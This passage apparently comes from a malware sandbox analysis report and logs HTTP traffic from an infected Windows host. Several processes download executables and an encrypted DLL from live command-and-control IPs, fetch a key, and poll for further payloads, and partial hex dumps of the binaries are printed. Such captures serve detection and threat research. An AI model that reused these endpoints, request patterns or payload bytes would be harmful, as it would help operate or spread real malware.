10	192.168.2.7	49917	31.41.244.11	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:51.321834087 CET	62	OUT	GET /files/hell911/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 13, 2024 18:53:52.164398909 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:51 GMT Content-Type: application/octet-stream Content-Length: 2660864 Last-Modified: Thu, 12 Dec 2024 23:33:40 GMT Connection: keep-alive ETag: "675b72d4-289a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AAA@A@'A@A4@A4@A4@A@AAA4@A46AA4@ARichAPELYVg$$$@(dm)@%(@%%@(%p%@$.text2$$ `.rdata^$`$@@.data %%@.rsrc%@%%@@.reloc@((@B
Dec 13, 2024 18:53:52.164443016 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 48 53 8b 5d 14 8b c1 56 8b 75 18 0f bf cb 81 c6 2a 3f 18 59 Data Ascii: UHS]Vu?YM}6/MWUEEKEE?YEbE,EQTEnxEELsE1};EzE.EE6/u}uTE7K+E\m
Dec 13, 2024 18:53:52.164704084 CET	1236	IN	Data Raw: 66 98 76 b9 f4 97 d4 41 0f b7 c0 89 45 e4 8d 87 31 7d 3b ac 89 45 d4 8d 87 d4 4c c6 73 89 5d 14 b3 7d 89 45 e8 8d 42 c2 c7 45 f0 31 30 34 c5 c7 45 d8 5a de 60 5a e9 f3 07 00 00 83 ff 7a 7c 58 8a 5d 10 8d 41 11 88 45 ff 81 c2 c7 a7 00 00 0f bf 05 Data Ascii: fvAE1};ELs]}EBE104EZ`Zz\|X]AE(e.UU)(ef(effE+MEEOGvp(e_(eE6/+(eU (Ei(e.]]E;#RE
Dec 13, 2024 18:53:52.164760113 CET	1236	IN	Data Raw: ee 15 59 34 38 28 0d ca 28 65 00 05 d2 51 e6 54 81 6d 0c 10 6f 00 00 8a 5d 10 89 45 d8 b8 3b 3c ea f6 2b 05 f4 28 65 00 89 45 f0 b8 31 7d 3b ac 2b c2 c6 45 d0 00 81 45 f4 09 ff 00 00 c7 45 ec 09 ff 00 00 89 45 d4 89 75 18 e9 11 03 00 00 3d 36 2f Data Ascii: Y48((eQTmo]E;<+(eE1};+EEEEu=6/E}bEiQTL(e]M(e6/Mv"Ky}u(e*?YE(e,>EiE+ME,ug(e6/
Dec 13, 2024 18:53:52.164814949 CET	1236	IN	Data Raw: 02 4d f8 66 d3 3d ec 28 65 00 8b 15 c0 28 65 00 8b 4d 10 d3 ea 0f af d0 b8 6f c9 00 00 5f 5e 5b 89 15 c0 28 65 00 8b e5 5d c2 1c 00 66 3b 45 e4 73 52 8b 45 f8 01 3d d8 28 65 00 0f b7 d0 8b c2 0f b6 c9 0f af 05 c4 28 65 00 5f a3 c4 28 65 00 0f b6 Data Ascii: Mf=(e(eMo_^[(e]f;EsRE=(e(e_(e(e(eXX(e^(eo(e[]E;Ev"(eE_(eo^[]E;Eu%E5(e__(eo^[];Eu$(q-(e+f
Dec 13, 2024 18:53:52.165062904 CET	672	IN	Data Raw: 75 d0 8b 75 ec 81 c6 36 8e 60 05 89 45 c4 01 75 c0 8b 75 08 89 45 d4 81 ee a0 37 00 00 8b 45 18 02 45 f0 33 ff 89 55 10 89 45 18 89 75 08 89 75 e0 89 7d 0c e9 d5 08 00 00 b8 af 69 00 00 66 39 45 0c 72 36 69 45 c8 dd 53 00 00 29 75 cc 8b 75 c4 01 Data Ascii: uu6`EuuE7EE3UEuu}if9Er6iES)uu(eEEE+f(euufEu;EuukEM)(e]fEEEME(ei(eiUE(eMumDivEEu
Dec 13, 2024 18:53:52.165098906 CET	1236	IN	Data Raw: f4 03 5d b8 2b 7d c4 81 45 d8 cf 38 00 00 89 45 bc 0f b6 c1 0f b6 0d f4 28 65 00 0f af c8 8b c3 0f af 45 08 c7 45 f8 7c ed 3f 69 89 7d 0c 80 c1 23 0f b7 f0 a1 c4 28 65 00 28 45 f0 05 c0 71 d4 be 01 45 e8 89 4d f4 8a 4d fc 8b 45 f4 66 d3 7d 14 8b Data Ascii: ]+}E8E(eEE\|?i}#(e(EqEMMEf}MEuuEUU;UUUE(e(eMuU3(eEE@P+Eml 0iMm5(eM(eEH-kEEE(eE
Dec 13, 2024 18:53:52.165139914 CET	1236	IN	Data Raw: 66 d3 7d 14 0f b6 4d bc a3 e4 28 65 00 b8 af 69 00 00 2b 05 e8 28 65 00 0f b7 c0 89 45 dc 89 45 d0 8b 45 f8 d3 e8 05 d2 c8 7a 45 89 55 10 89 45 f8 8b 45 14 89 45 c8 e9 55 01 00 00 3b 4d cc 75 56 2b 7d d8 8b 45 c4 8b 0d cc 28 65 00 d3 6d c0 8d 97 Data Ascii: f}M(ei+(eEEEzEUEEEU;MuV+}E(emE+EEi+(eEEEE}bEEE=isGfEzUf(e4.(eEBhMEEuE}f(eM
Dec 13, 2024 18:53:52.165154934 CET	1236	IN	Data Raw: 2b ca 8b 45 f8 81 ea cd ea cd 47 98 0f bf c9 0f af c8 81 ee 61 58 00 00 89 55 ec 66 89 0d dc 28 65 00 e9 12 fd ff ff 66 8b 45 14 0f b7 55 0c 3b 55 e8 8b 55 10 98 89 45 a4 75 39 8b 45 c0 2b 05 e8 28 65 00 80 45 fc f0 01 15 e4 28 65 00 89 45 c0 8b Data Ascii: +EGaXUf(efEU;UUEu9E+(eE(eEEEMM(e)E;ErlM(eUfEE)EEf(e(efEEMEuMM+(emf}EEEME`E;uFE3M
Dec 13, 2024 18:53:52.165193081 CET	1236	IN	Data Raw: ec 03 5d c0 8b 7d dc 80 45 18 10 8b 55 10 89 45 f4 8b 45 08 01 05 e8 28 65 00 03 fb 89 75 e0 e9 4b 02 00 00 0f bf 45 d4 3b d0 73 44 8b 45 f0 81 eb 91 4c 1d 15 8a 0d d8 28 65 00 8b 7d dc 00 55 f4 81 c7 ff 53 00 00 8b 55 10 d2 e8 8b 4d 1c 04 64 89 Data Ascii: ]}EUEE(euKE;sDEL(e}USUMdEEf(e~EE9EsbiEfEf5(e)(eEE(eM,8mMEEU3(e(eE9EuE(e
Dec 13, 2024 18:53:52.284585953 CET	1236	IN	Data Raw: 45 10 00 0f af 05 c4 28 65 00 89 55 08 c7 45 c8 59 4d 46 8c 89 45 9c a3 c4 28 65 00 32 c0 01 1d d4 28 65 00 89 45 fc e9 88 00 00 00 3b 55 bc 75 3b 8d 83 d8 c7 d6 8c c7 45 c4 07 a6 31 f4 89 45 ec 81 c3 c6 26 d8 2e 0f b6 c1 8b 4d 14 6b c0 57 88 45 Data Ascii: E(eUEYMFE(e2(eE;Uu;E1E&.MkWEEi9E}E=MMMME(eEEEEt>uu(eEEUUU;UUUM~IEM,SUEyA/EE$uE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49930	80.82.65.70	80	7444	C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:56.105710030 CET	412	OUT	GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:53:57.476614952 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:53:57 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:53:57.504126072 CET	386	OUT	GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:53:57.977818966 CET	224	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:53:57 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 21 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73 Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
Dec 13, 2024 18:53:58.425055981 CET	391	OUT	GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:53:58.991292953 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:53:58 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Length: 97296 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED] Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEPOuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~\|jbK!N7R}T2bsq1L^!\|qD'sLnD@bn%0=bQ1+lQXO\|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
Dec 13, 2024 18:53:58.991410971 CET	1236	IN	Data Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU\|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
Dec 13, 2024 18:53:58.991430998 CET	1236	IN	Data Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd Data Ascii: Dp!lR7+2J^'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: rUz(-dFI?[VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
Dec 13, 2024 18:53:58.991789103 CET	1236	IN	Data Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4 Data Ascii: BGpwCy6$h$xZ\|YQ\|5#n&!w@Duhs:\|BFGc3_^MH_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
Dec 13, 2024 18:53:58.991805077 CET	1236	IN	Data Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
Dec 13, 2024 18:53:58.991822004 CET	1236	IN	Data Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7 Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
Dec 13, 2024 18:53:58.991838932 CET	1236	IN	Data Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0 Data Ascii: +y@qE6a_]p{@v8/\|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
Dec 13, 2024 18:53:58.992505074 CET	1236	IN	Data Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc\|Ub<\|Y>. Tu#f-UM!+g@!4<fG7IkEl
Dec 13, 2024 18:53:58.999670029 CET	1236	IN	Data Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06 Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r\|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
Dec 13, 2024 18:53:58.999686956 CET	1236	IN	Data Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25 Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc\| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
Dec 13, 2024 18:53:59.007126093 CET	780	IN	Data Raw: d3 59 d3 30 18 53 4e 25 dc 9e 95 b9 da a6 3e 71 c0 45 79 32 7a f2 9f 43 ae e4 0b 25 8a bf 44 da e3 4d 77 72 50 8f 9d 18 42 0f 58 f1 b2 46 1d e6 97 70 c7 39 3b b2 a3 64 90 74 04 57 77 50 fc 49 1c ac 46 a7 37 5f 66 b7 fd b1 37 84 39 3f 7b d6 9b 57 Data Ascii: Y0SN%>qEy2zC%DMwrPBXFp9;dtWwPIF7_f79?{WdA_9qH1^S-;0_lc%.I5[j-(HK&c?EUXTVnMXyU47=`L4^9\7am:i`v{]
Dec 13, 2024 18:53:59.528642893 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:00.267036915 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:53:59 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:02.559235096 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:03.050115108 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:02 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:05.825403929 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:06.312603951 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:06 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:09.022955894 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:09.515763044 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:09 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:13.444509983 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:13.935240984 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:13 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:16.574578047 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:17.073081970 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:16 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:19.269388914 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:19.754849911 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:19 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:23.040721893 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:23.555861950 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:23 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:25.843369961 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:26.335556984 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:26 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:29.024406910 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:29.515120029 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:29 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 13, 2024 18:54:31.833534956 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:33.346255064 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:32 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
